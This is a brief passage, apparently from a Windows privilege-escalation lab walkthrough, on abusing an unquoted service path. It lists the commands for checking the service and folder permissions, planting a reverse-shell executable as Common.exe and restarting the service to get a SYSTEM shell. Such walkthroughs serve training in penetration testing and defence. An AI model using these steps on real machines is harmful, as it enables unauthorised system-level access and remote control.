now the unquoted service path we can drop an executable to that path and execute it once we have start permissions

let me show and example

imagine we have this service unquotedsvc

sc qc unquotedsvc

notice that the service path is unquoted and the service is running with system privs

C:\\PrivEsc\\accesschk.exe /accepteula -uwdq "C:\\Program Files\\Unquoted Path Service\\"

notice that the built-in users can read and write to this service

now let’s copy our reverse shell to this path

copy C:\\PrivEsc\\reverse.exe "C:\\Program Files\\Unquoted Path Service\\Common.exe"

now let’s run the service

net start unquotedsvc

and we got a shell as authority system